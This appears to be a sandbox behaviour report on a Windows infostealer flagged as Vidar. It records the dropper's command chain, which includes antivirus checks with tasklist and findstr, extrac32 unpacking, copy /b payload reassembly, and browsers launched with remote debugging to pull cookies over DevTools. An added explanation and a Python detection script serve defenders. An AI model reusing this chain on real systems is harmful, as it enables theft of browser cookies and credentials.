Source: 13.2.Surrey.com.43e0000.2.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 25xTHcaF7V.exe Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: i5pz5p.13.dr Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@88/309@41/19
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B41FA GetLastError,FormatMessageW, 13_2_009B41FA
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 13_2_009A2010
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A1A0B AdjustTokenPrivileges,CloseHandle, 13_2_009A1A0B
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009ADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 13_2_009ADD87
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 13_2_009B3A0E
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\5HIHIFKR.htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Users\user\AppData\Local\Temp\nsyBE7E.tmp
Source: 25xTHcaF7V.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: chrome.exe, 00000013.00000002.2814868675.0000203400450000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: gdjmozcb1.13.dr, im7gdj5pp.13.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 25xTHcaF7V.exe Virustotal: Detection: 31%
Source: 25xTHcaF7V.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File read: C:\Users\user\Desktop\25xTHcaF7V.exe
Source: unknown Process created: C:\Users\user\Desktop\25xTHcaF7V.exe "C:\Users\user\Desktop\25xTHcaF7V.exe"
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 634977
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Gtk
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Constitution" Wagon
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Surrey.com Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2312,i,10135865500869867964,659012948287771851,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2372,i,6228530341099286433,11719858513677495840,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6928 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6980 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 634977
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Gtk
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Constitution" Wagon
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Surrey.com Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2312,i,10135865500869867964,659012948287771851,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2372,i,6228530341099286433,11719858513677495840,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6928 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6980 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
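The process chain listed above is the part of this report a detection engineer would key on: the renamed payload copied to a .cmd and executed, tasklist output grepped with findstr for security-product process names, extrac32 used as an unpacker, copy /b reassembling Surrey.com from innocuous-looking fragments, choice used as a sleep, and then chrome.exe and msedge.exe spawned with --remote-debugging-port=9223 by a process that is not the browser. That last step is how the stealer reads cookies through the DevTools protocol (the strings section shows "webSocketDebuggerUrl", ws://localhost:9223 and {"id":1,"method":"Storage.getCookies"}) instead of decrypting the App-Bound-Encrypted cookie store on disk. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses report-style process-creation lines (the sample lines are constructed from the ones above, with the trailing link text stripped) and applies those checks. Rule names, severities, and the brave.exe/opera.exe entries in the browser list are my own choices; the security-product process names are the ones the dropper itself grepped for.

```python
import re
from dataclasses import dataclass

# Security-product process names the batch stage looked for with
# "tasklist | findstr" (taken from the command lines in this report).
AV_PROCESS_NAMES = {"opssvc", "wrsa", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "ekrn", "sophoshealth"}
CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe"}  # brave/opera added by me
EXEC_EXTENSIONS = (".com", ".exe", ".scr", ".pif")

@dataclass
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # command line of the created process

# "Source: <parent> Process created: <image> <cmdline>". The image path ends at the
# first ".exe"/".com" followed by a space; everything after it is the command line.
LINE_RE = re.compile(
    r"^Source: (?P<parent>.+?) Process created: (?P<image>.+?\.(?:exe|com)) (?P<cmdline>.*)$",
    re.IGNORECASE,
)

def parse_report_line(line: str):
    """Parse one process-creation line; None for unresolved 'unknown unknown' entries."""
    line = re.sub(r"\s+Jump to (?:behavior|dropped file)$", "", line.strip())
    m = LINE_RE.match(line)
    return ProcEvent(m["parent"], m["image"], m["cmdline"]) if m else None

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, severity, detail) findings for the dropper chain seen in this report."""
    findings = []
    for ev in events:
        img, cmd, low = basename(ev.image), ev.cmdline, ev.cmdline.lower()
        if img == "cmd.exe":
            # "copy X X.cmd & X.cmd": turn a renamed payload into a script and run it
            if re.search(r"\bcopy\s+(\S+)\s+\1\.(cmd|bat)\s*&\s*\1\.\2\b", cmd, re.IGNORECASE):
                findings.append(("copy-to-script-and-run", "high", cmd))
            # "copy /b a + b + ... dest": reassemble a binary from fragments
            if re.search(r"\bcopy\s+/b\b", low) and " + " in low:
                dest = cmd.split()[-1]
                sev = "high" if dest.lower().endswith(EXEC_EXTENSIONS) else "medium"
                findings.append(("fragment-concatenation", sev, cmd))
        elif img == "findstr.exe":
            hits = sorted(n for n in AV_PROCESS_NAMES if n in low)
            if hits:
                findings.append(("av-process-discovery", "medium", ", ".join(hits)))
        elif img == "extrac32.exe":
            findings.append(("lolbin-extrac32", "medium", cmd))  # CAB extraction via a system tool
        elif img == "choice.exe" and "/t" in low:
            findings.append(("choice-sleep", "low", cmd))        # timed prompt used as a delay
        elif (img in CHROMIUM_BROWSERS and "--remote-debugging-port=" in low
              and basename(ev.parent) not in CHROMIUM_BROWSERS):
            # A browser started with DevTools remote debugging by something other than the
            # browser itself: cookies can then be read over ws://localhost:<port> without
            # touching the App-Bound-Encrypted cookie store on disk.
            findings.append(("browser-remote-debugging-from-foreign-parent", "high",
                             f"{basename(ev.parent)} -> {cmd}"))
        if img.endswith(".com") and "\\appdata\\local\\temp\\" in ev.image.lower():
            findings.append(("temp-dot-com-execution", "high", ev.image))
    return findings

# Constructed from the process-creation lines in this report (link text removed).
SAMPLE_REPORT_LINES = [
    r'Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 634977',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Gtk',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Constitution" Wagon',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Surrey.com Q',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5',
    r'Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"',
    r'Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none',
    r'Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown',
]

def run_sample():
    events = [e for e in map(parse_report_line, SAMPLE_REPORT_LINES) if e]
    return detect(events)

if __name__ == "__main__":
    for rule, sev, detail in run_sample():
        print(f"[{sev:6}] {rule}: {detail}")
```

The parent check is what separates the stealer's launch from Chrome's own --type=utility children, which carry the same flags' lineage but are spawned by chrome.exe itself and are not flagged. It does not separate the stealer from a developer starting Chrome with remote debugging from a terminal, so in production tune the allowed-parent set to what your estate actually uses.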
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
